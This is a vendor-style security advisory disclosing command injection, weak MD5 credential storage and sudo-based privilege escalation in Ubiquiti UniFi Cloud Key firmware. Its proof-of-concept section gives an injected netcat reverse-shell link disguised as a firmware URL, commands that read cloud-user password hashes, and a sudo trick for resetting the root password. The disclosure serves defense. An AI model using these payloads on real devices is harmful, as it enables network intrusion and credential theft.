Ubiquiti Networks UniFi Cloud Key Multiple Critical Vulnerabilities

Title

SEC Consult Vulnerability Lab Security Advisory < 20170727-0 > Authenticated Command Injection & Cloud User Weak Crypto & Privilege Escalation

Product

Ubiquiti Networks UniFi Cloud Key

Vulnerable Version

Firmware v0.5.9/0.6.0

Fixed Version

Firmware v0.6.1

CVE Number

-

Impact

critical

Found

31.01.2017

By

T. Weber (Office Vienna) / SEC Consult Vulnerability Lab

The Ubiquitit UniFi Cloud Key is prone to command injection in the administrative interface. When an attacker lure a user to upgrade the firmware with a faked update link, the attacker can take over the device and the attached access points. In addition, the cloud user account password can be cracked.

Vendor Description

“Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets.”

Source: http://ir.ubnt.com/

 

Business Recommendation

SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.

 

Vulnerability Overview/ Description

 

1) Authenticated Command Injection & Cloud User Weak Crypto

The manual UniFi Cloud Key firmware upgrade function is prone to a command injection vulnerability which can be exploited for example by sending a manipulated upgrade link to a victim.

A reverse-shell can be used to get access to the device and this allows an attacker to get access to the internal network of the attacked user. The web user is “www-data” which has only few access and execution rights but by exploiting vulnerability 2) it is possible to gain root access on the device!

After a successful command injection the cloud user account password hash can be dumped. Since the UniFi Cloud Key has to communicate with the access points and configure their passwords as well, a hash has to be stored at another place than /etc/shadow to persist the keys on the devices. The hashes are stored in “system.cfg” using only MD5 hashing algorithm which can be cracked easily in reasonable time.

This configuration file consists the username and the password hash of the cloud user which is the same on all access points and the UniFi Cloud Key.

This configuration can be read by the user “www-data”. Afterwards, the hash can be cracked and the cloud user is hijacked. A remote-configuration of the wireless lan of the user is now possible for an attacker.

 

2) Privilege Escalation

The password of the root user can be changed by a lower privileged user on the device. This is possible because some binaries can be executed with sudo by this user without the root password.

 

Proof Of Concept

 

1) Authenticated Command Injection & Cloud-User Hash Leak

The following PHP snipplet is responsible for the command execution:

(api.inc, line 476)

exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc);
return CMD_WGET . $url . CMD_WGET_OPTIONS;
}
[...]

The following link opens a reverse-shell:

;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash;

To ‘hide’ the command from the eyes of the user in the upgrade window, one can also decorate the link:

;busybox nc 192.168.3.142 8999 -e /bin/bash; https:// secconsult.build-1337.bin

As listener, netcat was used:

$ nc -lvp <Attacker-Port>

To hijack the cloud account, steal username and password hash:

(user: www-data)
$ cd /srv/unifi/data/devices/uap/
$ ls
<serial-number-of-an-ap>
$ cd <serial-number-of-an-ap>
$ cat system.cfg | grep "users\.1\.name"
users.1.name=<username>
$ cat system.cfg | grep "users\.1\.password"
users.1.password=<password>

The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg the same password is just MD5 hashed and can be cracked easily in reasonable time.

 

2) Privilege Escalation

Because of the following line in /etc/sudoers.d/cloudkey-webui one can elevate the rights of www-data to root:

(cloudkey-webui, line 1)

www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service unifi *, /usr/bin/java

With the following commands one can change the root password without actually knowing it:

(user: www-data)
$ cd /tmp
$ echo "root:password" > newfile.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt

The root password is now changed to ‘password’.

SSH login is also possible:

$ ssh root@<IP-Address>

 

Vulnerable / Tested Versions

Ubiquiti Networks UniFi Cloud Key version 0.5.9/0.6.0 has been tested. This version was the latest at the time the security vulnerabilities were discovered.